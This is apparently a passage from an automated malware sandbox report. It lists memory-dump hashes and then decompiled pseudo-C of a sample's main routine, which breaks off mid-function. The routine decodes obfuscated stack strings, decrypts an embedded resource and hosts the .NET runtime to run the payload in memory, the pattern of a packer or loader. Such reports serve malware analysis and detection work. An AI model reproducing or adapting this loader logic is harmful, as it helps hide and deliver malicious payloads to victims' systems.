                                                                                                              • Instruction Fuzzy Hash: EA213DB2504208DFCB04CF10D9C4B36BFA6FF88328F2C8569DA054B226C336D846E7A1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658192698.000000000100D000.00000040.00000001.sdmp, Offset: 0100D000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 227660859a77e86010c63557e90a347eb133a54ada1c38b7ee2f7b44bbfca9e3
                                                                                                              • Instruction ID: dd346daf769b1c6dca02444d8036345a3b2e2708e6856213b0af4d53d44299bc
                                                                                                              • Opcode Fuzzy Hash: 227660859a77e86010c63557e90a347eb133a54ada1c38b7ee2f7b44bbfca9e3
                                                                                                              • Instruction Fuzzy Hash: 1721D3B1604240DFEB16CF94D8C4B16BBA5FB84354F24C9A9E98D4B286C376D847CB71
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658173634.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
                                                                                                              • Instruction ID: c4e599d32a8430fac770cf4cd68afe829108e1af9160eb3e48ba8365723131d7
                                                                                                              • Opcode Fuzzy Hash: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
                                                                                                              • Instruction Fuzzy Hash: 4111D376904284CFCB15CF10D5C4B26BF72FF98324F2C86A9D9050B626C33AD856DBA2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658192698.000000000100D000.00000040.00000001.sdmp, Offset: 0100D000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 21dbda9fffde9beb189af7165341122266bd3c9337f42a4093e234a02c9dbdce
                                                                                                              • Instruction ID: 781f99025f7fa56691193a6742694a18bc9ac21fb1082c6107dae0407690f37c
                                                                                                              • Opcode Fuzzy Hash: 21dbda9fffde9beb189af7165341122266bd3c9337f42a4093e234a02c9dbdce
                                                                                                              • Instruction Fuzzy Hash: 1411D075504280CFDB12CF54D5C4B15FFB1FB44324F28C6AAE8494B696C33AD44ACBA2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658173634.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 185a041227cdca6463d040aebbacde0696caeebff0c0e2e8271490c0855a18cc
                                                                                                              • Instruction ID: 333ea8bf14ba460295a973b4d438dcca4eb2dcafd48eff95d28d8947b92ea550
                                                                                                              • Opcode Fuzzy Hash: 185a041227cdca6463d040aebbacde0696caeebff0c0e2e8271490c0855a18cc
                                                                                                              • Instruction Fuzzy Hash: 0301F7735083489AE7246A15CC84776FBD8EF41338F18855AEF044F256C3799840E6B1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658173634.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8d7179ea6ac5e1a70859c4a43371feef31db39a84425afd57e42fa64011495c2
                                                                                                              • Instruction ID: 69d0874965b412ba9cc89e5f1bc12d3b86b7c7b9f31173fd0a6ed884a82ead59
                                                                                                              • Opcode Fuzzy Hash: 8d7179ea6ac5e1a70859c4a43371feef31db39a84425afd57e42fa64011495c2
                                                                                                              • Instruction Fuzzy Hash: 22F0C8724042449EE7149A05CCC4762FB98EF41734F18C05AEE040F256C3799844DAB0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Non-executed Functions

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9a055a23cbe128ef3dcde55f9d850df28b8b3de4527ad0b5f79a59ce871f125c
                                                                                                              • Instruction ID: 9840934cca05ce6c28119132547e84b3d44731341adcb83a2b0641d60fa6f0f3
                                                                                                              • Opcode Fuzzy Hash: 9a055a23cbe128ef3dcde55f9d850df28b8b3de4527ad0b5f79a59ce871f125c
                                                                                                              • Instruction Fuzzy Hash: D5524931A1061A8FDB15CF68C884BAEF7B6FF44304F5584A9EA09AB251D771FD85CB80
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 83c865f6a0c1625353011edd262bbad273e913ddf6abbf1f6980b0dd48a15699
                                                                                                              • Instruction ID: 85e508bc843eec600792f053be4301beee2420bc2fa27baa7e79df26864a2ca6
                                                                                                              • Opcode Fuzzy Hash: 83c865f6a0c1625353011edd262bbad273e913ddf6abbf1f6980b0dd48a15699
                                                                                                              • Instruction Fuzzy Hash: B3A14C36E1021A8FCF15DFA5C8445ADFBB2FF85301F15817AEA05AB225EB31A955CF40
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.658306370.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f826cf66eb84c45fcf4be5022f24f0147237b309fd71e42d737516e6f7dd8bf9
                                                                                                              • Instruction ID: ef94eac261d1c09ea5b8525fa2038590cb09699c97c506974cc86894ddc1ca3d
                                                                                                              • Opcode Fuzzy Hash: f826cf66eb84c45fcf4be5022f24f0147237b309fd71e42d737516e6f7dd8bf9
                                                                                                              • Instruction Fuzzy Hash: 8DC16DF1811746CBF379EF65E8882997BB9FB85328F504328D2616B6D8D7B4104ACF84
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Executed Functions

                                                                                                              C-Code - Quality: 72%
                                                                                                              			E00401980(void* __edx, void* __eflags) {
                                                                                                              				char _v528;
                                                                                                              				char _v532;
                                                                                                              				void* _v556;
                                                                                                              				void* _v560;
                                                                                                              				void* _v564;
                                                                                                              				char _v816;
                                                                                                              				char _v820;
                                                                                                              				char _v840;
                                                                                                              				intOrPtr _v844;
                                                                                                              				char _v852;
                                                                                                              				char _v876;
                                                                                                              				char _v916;
                                                                                                              				char _v948;
                                                                                                              				char _v980;
                                                                                                              				char _v984;
                                                                                                              				char _v1012;
                                                                                                              				char _v1016;
                                                                                                              				char _v1048;
                                                                                                              				intOrPtr _v1052;
                                                                                                              				void* _v1056;
                                                                                                              				char _v1057;
                                                                                                              				char _v1058;
                                                                                                              				char _v1059;
                                                                                                              				char _v1060;
                                                                                                              				char _v1061;
                                                                                                              				char _v1062;
                                                                                                              				char _v1063;
                                                                                                              				char _v1064;
                                                                                                              				char _v1065;
                                                                                                              				char _v1066;
                                                                                                              				char _v1067;
                                                                                                              				char _v1068;
                                                                                                              				char _v1069;
                                                                                                              				char _v1070;
                                                                                                              				char _v1071;
                                                                                                              				char _v1072;
                                                                                                              				char _v1073;
                                                                                                              				char _v1074;
                                                                                                              				char _v1075;
                                                                                                              				char _v1076;
                                                                                                              				char _v1077;
                                                                                                              				char _v1078;
                                                                                                              				char _v1079;
                                                                                                              				void* _v1080;
                                                                                                              				char _v1081;
                                                                                                              				char _v1082;
                                                                                                              				char _v1083;
                                                                                                              				char _v1084;
                                                                                                              				char _v1085;
                                                                                                              				char _v1086;
                                                                                                              				char _v1087;
                                                                                                              				char _v1088;
                                                                                                              				char _v1092;
                                                                                                              				char _v1096;
                                                                                                              				CHAR* _v1100;
                                                                                                              				struct HRSRC__* _v1104;
                                                                                                              				signed int _v1108;
                                                                                                              				int _v1112;
                                                                                                              				int _v1116;
                                                                                                              				signed int _v1120;
                                                                                                              				CHAR* _v1124;
                                                                                                              				char _v1125;
                                                                                                              				char _v1126;
                                                                                                              				char _v1127;
                                                                                                              				char _v1128;
                                                                                                              				char _v1129;
                                                                                                              				char _v1130;
                                                                                                              				char _v1131;
                                                                                                              				char _v1132;
                                                                                                              				char _v1133;
                                                                                                              				char _v1134;
                                                                                                              				char _v1135;
                                                                                                              				void* _v1136;
                                                                                                              				char _v1137;
                                                                                                              				char _v1138;
                                                                                                              				char _v1139;
                                                                                                              				int _v1140;
                                                                                                              				char _v1141;
                                                                                                              				char _v1142;
                                                                                                              				char _v1143;
                                                                                                              				void* _v1144;
                                                                                                              				char _v1145;
                                                                                                              				char _v1146;
                                                                                                              				char _v1147;
                                                                                                              				void* _v1148;
                                                                                                              				char _v1149;
                                                                                                              				char _v1150;
                                                                                                              				char _v1151;
                                                                                                              				char _v1152;
                                                                                                              				char _v1153;
                                                                                                              				char _v1154;
                                                                                                              				char _v1155;
                                                                                                              				char _v1156;
                                                                                                              				char _v1157;
                                                                                                              				char _v1158;
                                                                                                              				char _v1159;
                                                                                                              				char _v1160;
                                                                                                              				char _v1161;
                                                                                                              				char _v1162;
                                                                                                              				char _v1163;
                                                                                                              				char _v1164;
                                                                                                              				char _v1168;
                                                                                                              				intOrPtr* _v1176;
                                                                                                              				char _v1180;
                                                                                                              				char _v1188;
                                                                                                              				intOrPtr* _v1192;
                                                                                                              				intOrPtr* _v1212;
                                                                                                              				intOrPtr* _v1248;
                                                                                                              				intOrPtr* _v1260;
                                                                                                              				intOrPtr* _v1264;
                                                                                                              				void* __ebx;
                                                                                                              				void* __edi;
                                                                                                              				void* __esi;
                                                                                                              				void* __ebp;
                                                                                                              				void* _t338;
                                                                                                              				void* _t341;
                                                                                                              				int _t342;
                                                                                                              				intOrPtr* _t350;
                                                                                                              				int _t351;
                                                                                                              				long _t353;
                                                                                                              				signed int _t355;
                                                                                                              				intOrPtr* _t359;
                                                                                                              				long _t360;
                                                                                                              				struct HINSTANCE__* _t366;
                                                                                                              				CHAR* _t367;
                                                                                                              				int _t370;
                                                                                                              				intOrPtr _t371;
                                                                                                              				int _t372;
                                                                                                              				intOrPtr* _t373;
                                                                                                              				void* _t380;
                                                                                                              				intOrPtr* _t383;
                                                                                                              				intOrPtr* _t384;
                                                                                                              				intOrPtr* _t387;
                                                                                                              				intOrPtr* _t388;
                                                                                                              				int _t389;
                                                                                                              				intOrPtr* _t393;
                                                                                                              				intOrPtr* _t397;
                                                                                                              				intOrPtr* _t398;
                                                                                                              				long _t401;
                                                                                                              				intOrPtr _t402;
                                                                                                              				intOrPtr _t403;
                                                                                                              				long _t409;
                                                                                                              				intOrPtr _t410;
                                                                                                              				intOrPtr _t411;
                                                                                                              				intOrPtr* _t419;
                                                                                                              				int _t421;
                                                                                                              				int _t422;
                                                                                                              				intOrPtr* _t423;
                                                                                                              				intOrPtr* _t426;
                                                                                                              				void* _t433;
                                                                                                              				int _t434;
                                                                                                              				int _t436;
                                                                                                              				intOrPtr* _t440;
                                                                                                              				int _t442;
                                                                                                              				int _t445;
                                                                                                              				int _t447;
                                                                                                              				int _t448;
                                                                                                              				int _t450;
                                                                                                              				CHAR* _t452;
                                                                                                              				char _t453;
                                                                                                              				intOrPtr* _t455;
                                                                                                              				intOrPtr* _t457;
                                                                                                              				signed int _t462;
                                                                                                              				intOrPtr* _t476;
                                                                                                              				intOrPtr _t496;
                                                                                                              				intOrPtr* _t497;
                                                                                                              				intOrPtr* _t499;
                                                                                                              				intOrPtr* _t501;
                                                                                                              				intOrPtr _t502;
                                                                                                              				void* _t503;
                                                                                                              				struct HRSRC__* _t506;
                                                                                                              				int _t517;
                                                                                                              				intOrPtr* _t528;
                                                                                                              				int _t530;
                                                                                                              				int _t532;
                                                                                                              				int _t534;
                                                                                                              				int _t535;
                                                                                                              				int _t536;
                                                                                                              				int _t537;
                                                                                                              				void* _t538;
                                                                                                              				struct HRSRC__* _t539;
                                                                                                              				intOrPtr* _t540;
                                                                                                              				void* _t542;
                                                                                                              				void* _t543;
                                                                                                              				void* _t544;
                                                                                                              				void* _t545;
                                                                                                              				intOrPtr* _t546;
                                                                                                              				intOrPtr* _t547;
                                                                                                              				void* _t548;
                                                                                                              				intOrPtr* _t549;
                                                                                                              				intOrPtr* _t550;
                                                                                                              				intOrPtr* _t551;
                                                                                                              				struct HINSTANCE__* _t552;
                                                                                                              				void* _t553;
                                                                                                              				void* _t560;
                                                                                                              				void* _t562;
                                                                                                              				void* _t566;
                                                                                                              				void* _t567;
                                                                                                              				intOrPtr* _t568;
                                                                                                              				void* _t570;
                                                                                                              				void* _t571;
                                                                                                              				void* _t572;
                                                                                                              
                                                                                                              				_t572 = __eflags;
                                                                                                              				_t503 = __edx;
                                                                                                              				__imp__OleInitialize(0); // executed
                                                                                                              				_v1156 = 0xe0;
                                                                                                              				_v1155 = 0x3b;
                                                                                                              				_v1154 = 0x8d;
                                                                                                              				_v1153 = 0x2a;
                                                                                                              				_v1152 = 0xa2;
                                                                                                              				_v1151 = 0x2a;
                                                                                                              				_v1150 = 0x2a;
                                                                                                              				_v1149 = 0x41;
                                                                                                              				_v1148 = 0xd3;
                                                                                                              				_v1147 = 0x20;
                                                                                                              				_v1146 = 0x64;
                                                                                                              				_v1145 = 6;
                                                                                                              				_v1144 = 0x8a;
                                                                                                              				_v1143 = 0xf7;
                                                                                                              				_v1142 = 0x3d;
                                                                                                              				_v1141 = 0x9d;
                                                                                                              				_v1140 = 0xd9;
                                                                                                              				_v1139 = 0xee;
                                                                                                              				_v1138 = 0x15;
                                                                                                              				_v1137 = 0x68;
                                                                                                              				_v1136 = 0xf4;
                                                                                                              				_v1135 = 0x76;
                                                                                                              				_v1134 = 0xb9;
                                                                                                              				_v1133 = 0x34;
                                                                                                              				_v1132 = 0xbf;
                                                                                                              				_v1131 = 0x1e;
                                                                                                              				_v1130 = 0xe7;
                                                                                                              				_v1129 = 0x78;
                                                                                                              				_v1128 = 0x98;
                                                                                                              				_v1127 = 0xe9;
                                                                                                              				_v1126 = 0x6f;
                                                                                                              				_v1125 = 0xb4;
                                                                                                              				_v1124 = 0;
                                                                                                              				_push(E00401650( &_v1156,  &_v876));
                                                                                                              				_t338 = E0040B95E(0xd3, _t503, _t538, _t543, _t572);
                                                                                                              				_t560 =  &_v1152 + 0xc;
                                                                                                              				if(_t338 == "0x1") {
                                                                                                              					L102:
                                                                                                              					__eflags = 0;
                                                                                                              					return 0;
                                                                                                              				} else {
                                                                                                              					_t341 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                                                              					_t544 = _t341;
                                                                                                              					_v556 = 0x224;
                                                                                                              					_v1088 = 0xce;
                                                                                                              					_v1087 = 0x27;
                                                                                                              					_v1086 = 0x9c;
                                                                                                              					_v1085 = 0x1a;
                                                                                                              					_v1084 = 0x95;
                                                                                                              					_v1083 = 0x2e;
                                                                                                              					_v1082 = 0x22;
                                                                                                              					_v1081 = 0x57;
                                                                                                              					_v1080 = 0x91;
                                                                                                              					_v1079 = 0x21;
                                                                                                              					_v1078 = 0x57;
                                                                                                              					_v1077 = 0x3a;
                                                                                                              					_v1076 = 0xf8;
                                                                                                              					_v1075 = 0x98;
                                                                                                              					_v1074 = 0x5b;
                                                                                                              					_v1073 = 0xf4;
                                                                                                              					_v1072 = 0xb5;
                                                                                                              					_v1071 = 0x87;
                                                                                                              					_v1070 = 0x7b;
                                                                                                              					_v1069 = 0xf;
                                                                                                              					_v1068 = 0xf4;
                                                                                                              					_v1067 = 0x76;
                                                                                                              					_v1066 = 0xb9;
                                                                                                              					_v1065 = 0x34;
                                                                                                              					_v1064 = 0xbf;
                                                                                                              					_v1063 = 0x1e;
                                                                                                              					_v1062 = 0xe7;
                                                                                                              					_v1061 = 0x78;
                                                                                                              					_v1060 = 0x98;
                                                                                                              					_v1059 = 0xe9;
                                                                                                              					_v1058 = 0x6f;
                                                                                                              					_v1057 = 0xb4;
                                                                                                              					_v1056 = 0;
                                                                                                              					_v1160 = 0xc0;
                                                                                                              					_v1159 = 0x38;
                                                                                                              					_v1158 = 0x8d;
                                                                                                              					_v1157 = 0x1f;
                                                                                                              					_v1156 = 0x8e;
                                                                                                              					_v1155 = 0x30;
                                                                                                              					_v1154 = 0x65;
                                                                                                              					_v1153 = 0x47;
                                                                                                              					_v1152 = 0xd3;
                                                                                                              					_v1151 = 0x29;
                                                                                                              					_v1150 = 0x3b;
                                                                                                              					_v1149 = 0x56;
                                                                                                              					_v1148 = 0xf8;
                                                                                                              					_v1147 = 0x98;
                                                                                                              					_v1146 = 0x5b;
                                                                                                              					_v1145 = 0xf4;
                                                                                                              					_v1144 = 0xb5;
                                                                                                              					_v1143 = 0x87;
                                                                                                              					_v1142 = 0x7b;
                                                                                                              					_v1141 = 0xf;
                                                                                                              					_v1140 = 0xf4;
                                                                                                              					_v1139 = 0x76;
                                                                                                              					_v1138 = 0xb9;
                                                                                                              					_v1137 = 0x34;
                                                                                                              					_v1136 = 0xbf;
                                                                                                              					_v1135 = 0x1e;
                                                                                                              					_v1134 = 0xe7;
                                                                                                              					_v1133 = 0x78;
                                                                                                              					_v1132 = 0x98;
                                                                                                              					_v1131 = 0xe9;
                                                                                                              					_v1130 = 0x6f;
                                                                                                              					_v1129 = 0xb4;
                                                                                                              					_v1128 = 0;
                                                                                                              					_t342 = Module32First(_t544,  &_v556); // executed
                                                                                                              					if(_t342 == 0) {
                                                                                                              						L38:
                                                                                                              						FindCloseChangeNotification(_t544); // executed
                                                                                                              						_t552 = GetModuleHandleA(0);
                                                                                                              						_v1164 = 0xfc;
                                                                                                              						_v1163 = 0xb;
                                                                                                              						_v1162 = 0xff;
                                                                                                              						_v1161 = 0x75;
                                                                                                              						_v1160 = 0xe7;
                                                                                                              						_v1159 = 0x44;
                                                                                                              						_v1158 = 0x4b;
                                                                                                              						_v1157 = 0x23;
                                                                                                              						_v1156 = 0xbf;
                                                                                                              						_v1155 = 0x45;
                                                                                                              						_v1154 = 0x3b;
                                                                                                              						_v1153 = 0x56;
                                                                                                              						_v1152 = 0xf8;
                                                                                                              						_v1151 = 0x98;
                                                                                                              						_v1150 = 0x5b;
                                                                                                              						_v1149 = 0xf4;
                                                                                                              						_v1148 = 0xb5;
                                                                                                              						_v1147 = 0x87;
                                                                                                              						_v1146 = 0x7b;
                                                                                                              						_v1145 = 0xf;
                                                                                                              						_v1144 = 0xf4;
                                                                                                              						_v1143 = 0x76;
                                                                                                              						_v1142 = 0xb9;
                                                                                                              						_v1141 = 0x34;
                                                                                                              						_v1140 = 0xbf;
                                                                                                              						_v1139 = 0x1e;
                                                                                                              						_v1138 = 0xe7;
                                                                                                              						_v1137 = 0x78;
                                                                                                              						_v1136 = 0x98;
                                                                                                              						_v1135 = 0xe9;
                                                                                                              						_v1134 = 0x6f;
                                                                                                              						_v1133 = 0xb4;
                                                                                                              						_v1132 = 0;
                                                                                                              						_t539 = FindResourceA(_t552, E00401650( &_v1164,  &_v852), 0xa);
                                                                                                              						_v1104 = _t539;
                                                                                                              						_t545 = LoadResource(_t552, _t539);
                                                                                                              						_t452 = LockResource(_t545);
                                                                                                              						_t350 = E0040B80D(_t452,  &_v1164, _t539, SizeofResource(_t552, _t539)); // executed
                                                                                                              						_push(0x40022);
                                                                                                              						_t540 = _t350; // executed
                                                                                                              						_t351 = E0040AF26(_t452, _t540, __eflags); // executed
                                                                                                              						_t562 = _t560 + 0x10;
                                                                                                              						_v1100 = _t351;
                                                                                                              						__eflags = _t351;
                                                                                                              						if(_t351 == 0) {
                                                                                                              							_v1124 = 0;
                                                                                                              						} else {
                                                                                                              							E0040B9F0(_t540, _t351, 0, 0x40022);
                                                                                                              							_t562 = _t562 + 0xc;
                                                                                                              							_v1124 = _v1100;
                                                                                                              						}
                                                                                                              						E00401300(_v1124);
                                                                                                              						_t506 = _v1104;
                                                                                                              						_t353 = SizeofResource(_t552, _t506);
                                                                                                              						_v1120 = _t353;
                                                                                                              						asm("cdq");
                                                                                                              						_t507 = _t506 & 0x000003ff;
                                                                                                              						_t355 = _t353 + (_t506 & 0x000003ff) >> 0xa;
                                                                                                              						__eflags = _t355;
                                                                                                              						if(_t355 > 0) {
                                                                                                              							_v1100 = _t452;
                                                                                                              							_v1052 = _t540 - _t452;
                                                                                                              							_v1108 = _t355;
                                                                                                              							do {
                                                                                                              								_t436 = _v1100;
                                                                                                              								_push(_v1052 + _t436);
                                                                                                              								_push(0x400);
                                                                                                              								_push(_t436);
                                                                                                              								E00401560(_t452, _v1124);
                                                                                                              								_v1112 = _v1112 + 0x400;
                                                                                                              								_t177 =  &_v1120;
                                                                                                              								 *_t177 = _v1120 - 1;
                                                                                                              								__eflags =  *_t177;
                                                                                                              							} while ( *_t177 != 0);
                                                                                                              						}
                                                                                                              						_t462 = _v1120 & 0x800003ff;
                                                                                                              						__eflags = _t462;
                                                                                                              						if(_t462 < 0) {
                                                                                                              							_t462 = (_t462 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                              							__eflags = _t462;
                                                                                                              						}
                                                                                                              						__eflags = _t462;
                                                                                                              						if(_t462 > 0) {
                                                                                                              							_t433 = _v1120 - _t462;
                                                                                                              							_t507 = _t433 + _t540;
                                                                                                              							_push(_t433 + _t540);
                                                                                                              							_push(_t462);
                                                                                                              							_t434 = _t433 + _t452;
                                                                                                              							__eflags = _t434;
                                                                                                              							_push(_t434);
                                                                                                              							E00401560(_t452, _v1124);
                                                                                                              						}
                                                                                                              						E0040B9F0(_t540, _t452, 0, _v1120);
                                                                                                              						FreeResource(_t545);
                                                                                                              						_t453 =  *_t540;
                                                                                                              						_v1048 = _t453;
                                                                                                              						_t359 = E0040B80D(_t453, _t507, _t540, _t453); // executed
                                                                                                              						_t546 = _t359;
                                                                                                              						_t360 = SizeofResource(_t552, _v1104);
                                                                                                              						_t186 = _t540 + 4; // 0x4
                                                                                                              						E0040AC10(_t546,  &_v1048, _t186, _t360);
                                                                                                              						E0040B9F0(_t540, _t540, 0, _v1120);
                                                                                                              						_t191 = _t546 + 0xe; // 0xe
                                                                                                              						_t553 = _t191;
                                                                                                              						_v1164 = 0xce;
                                                                                                              						_v1163 = 0x27;
                                                                                                              						_v1162 = 0x9c;
                                                                                                              						_v1161 = 0x1a;
                                                                                                              						_v1160 = 0x95;
                                                                                                              						_v1159 = 0x21;
                                                                                                              						_v1158 = 0x2e;
                                                                                                              						_v1157 = 0xd;
                                                                                                              						_v1156 = 0xdb;
                                                                                                              						_v1155 = 0x29;
                                                                                                              						_v1154 = 0x57;
                                                                                                              						_v1153 = 0x56;
                                                                                                              						_v1152 = 0xf8;
                                                                                                              						_v1151 = 0x98;
                                                                                                              						_v1150 = 0x5b;
                                                                                                              						_v1149 = 0xf4;
                                                                                                              						_v1148 = 0xb5;
                                                                                                              						_v1147 = 0x87;
                                                                                                              						_v1146 = 0x7b;
                                                                                                              						_v1145 = 0xf;
                                                                                                              						_v1144 = 0xf4;
                                                                                                              						_v1143 = 0x76;
                                                                                                              						_v1142 = 0xb9;
                                                                                                              						_v1141 = 0x34;
                                                                                                              						_v1140 = 0xbf;
                                                                                                              						_v1139 = 0x1e;
                                                                                                              						_v1138 = 0xe7;
                                                                                                              						_v1137 = 0x78;
                                                                                                              						_v1136 = 0x98;
                                                                                                              						_v1135 = 0xe9;
                                                                                                              						_v1134 = 0x6f;
                                                                                                              						_v1133 = 0xb4;
                                                                                                              						_v1132 = 0;
                                                                                                              						_t366 = LoadLibraryA(E00401650( &_v1164,  &_v916));
                                                                                                              						_v1164 = 0xe0;
                                                                                                              						_v1163 = 0x18;
                                                                                                              						_v1162 = 0xad;
                                                                                                              						_v1161 = 0x36;
                                                                                                              						_v1160 = 0x95;
                                                                                                              						_v1159 = 0x21;
                                                                                                              						_v1158 = 0x2a;
                                                                                                              						_v1157 = 0x57;
                                                                                                              						_v1156 = 0xda;
                                                                                                              						_v1155 = 0xc;
                                                                                                              						_v1154 = 0x55;
                                                                                                              						_v1153 = 0x25;
                                                                                                              						_v1152 = 0x8c;
                                                                                                              						_v1151 = 0xf9;
                                                                                                              						_v1150 = 0x35;
                                                                                                              						_v1149 = 0x97;
                                                                                                              						_v1148 = 0xd0;
                                                                                                              						_v1147 = 0x87;
                                                                                                              						_v1146 = 0x7b;
                                                                                                              						_v1145 = 0xf;
                                                                                                              						_v1144 = 0xf4;
                                                                                                              						_v1143 = 0x76;
                                                                                                              						_v1142 = 0xb9;
                                                                                                              						_v1141 = 0x34;
                                                                                                              						_v1140 = 0xbf;
                                                                                                              						_v1139 = 0x1e;
                                                                                                              						_v1138 = 0xe7;
                                                                                                              						_v1137 = 0x78;
                                                                                                              						_v1136 = 0x98;
                                                                                                              						_v1135 = 0xe9;
                                                                                                              						_v1134 = 0x6f;
                                                                                                              						_v1133 = 0xb4;
                                                                                                              						_v1132 = 0;
                                                                                                              						_t367 = E00401650( &_v1164,  &_v948);
                                                                                                              						_t566 = _t562 + 0x3c;
                                                                                                              						 *0x423480 = GetProcAddress(_t366, _t367);
                                                                                                              						_t542 = 0;
                                                                                                              						_v1056 = 0;
                                                                                                              						_v1112 = 0;
                                                                                                              						_v1116 = 0;
                                                                                                              						_v1125 = 0;
                                                                                                              						_v820 =  &_v816;
                                                                                                              						_t370 = E004018D0( &_v816,  &_v820,  &_v1164, _t546, 3);
                                                                                                              						_push( &_v1064);
                                                                                                              						_push(0x41b230);
                                                                                                              						_push(0x41b220);
                                                                                                              						_push(0);
                                                                                                              						_push(L"wks");
                                                                                                              						_push(L"v2.0.50727"); // executed
                                                                                                              						L0040AD3E(); // executed
                                                                                                              						__eflags = _t370;
                                                                                                              						if(_t370 < 0) {
                                                                                                              							_t542 = 0;
                                                                                                              							__eflags = 0;
                                                                                                              							goto L58;
                                                                                                              						} else {
                                                                                                              							_t419 = _v1080;
                                                                                                              							_t421 =  *((intOrPtr*)( *((intOrPtr*)( *_t419 + 0x28))))(_t419); // executed
                                                                                                              							__eflags = _t421;
                                                                                                              							if(_t421 < 0) {
                                                                                                              								L58:
                                                                                                              								_v1149 = 1;
                                                                                                              							} else {
                                                                                                              								_t422 = _v1140;
                                                                                                              								__eflags = _t422;
                                                                                                              								if(_t422 != 0) {
                                                                                                              									 *((intOrPtr*)( *((intOrPtr*)( *_t422 + 8))))(_t422);
                                                                                                              								}
                                                                                                              								_t423 = _v1084;
                                                                                                              								_v1140 = _t542;
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t423 + 0x34))))(_t423,  &_v1140); // executed
                                                                                                              								_t546 = _v1148;
                                                                                                              								__eflags = _t546 - _t542;
                                                                                                              								if(_t546 == _t542) {
                                                                                                              									E0040AD50(0x80004003);
                                                                                                              								}
                                                                                                              								_t426 = _v1152;
                                                                                                              								__eflags = _t426 - _t542;
                                                                                                              								if(_t426 != _t542) {
                                                                                                              									 *((intOrPtr*)( *((intOrPtr*)( *_t426 + 8))))(_t426);
                                                                                                              								}
                                                                                                              								_v1152 = _t542;
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t546))))(_t546, 0x41b270,  &_v1152);
                                                                                                              							}
                                                                                                              						}
                                                                                                              						_t371 = _v844;
                                                                                                              						__eflags = _t371 -  &_v840;
                                                                                                              						if(__eflags != 0) {
                                                                                                              							_push(_t371);
                                                                                                              							E0040B675(_t453, _t542, _t546, __eflags);
                                                                                                              							_t566 = _t566 + 4;
                                                                                                              						}
                                                                                                              						__eflags = _v1149;
                                                                                                              						if(_v1149 == 0) {
                                                                                                              							_v1148 = _t542;
                                                                                                              							E00401870( &_v1132, _t553, "_._");
                                                                                                              							_t547 = __imp__#8;
                                                                                                              							_v1148 = _t542;
                                                                                                              							 *_t547( &_v1072);
                                                                                                              							E00401870( &_v1084, _t553, "___");
                                                                                                              							_t380 =  *_t547( &_v1064);
                                                                                                              							_t454 = _t453 + 0xfffffff2;
                                                                                                              							_v1140 = _t453 + 0xfffffff2;
                                                                                                              							_v1136 = _t542;
                                                                                                              							__imp__#15(0x11, 1,  &_v1140); // executed
                                                                                                              							_t548 = _t380;
                                                                                                              							_v1156 = _t542;
                                                                                                              							__imp__#23(_t548,  &_v1156);
                                                                                                              							E0040B310(_t453 + 0xfffffff2, _t542, _t548, _v1164, _t553, _t454);
                                                                                                              							_t567 = _t566 + 0xc;
                                                                                                              							__imp__#24(_t548);
                                                                                                              							_t383 = _v1180;
                                                                                                              							__eflags = _t383 - _t542;
                                                                                                              							if(_t383 == _t542) {
                                                                                                              								_t383 = E0040AD50(0x80004003);
                                                                                                              							}
                                                                                                              							_t455 = _t383;
                                                                                                              							_t384 = _v1180;
                                                                                                              							__eflags = _t384 - _t542;
                                                                                                              							if(_t384 != _t542) {
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t384 + 8))))(_t384);
                                                                                                              							}
                                                                                                              							_v1180 = _t542;
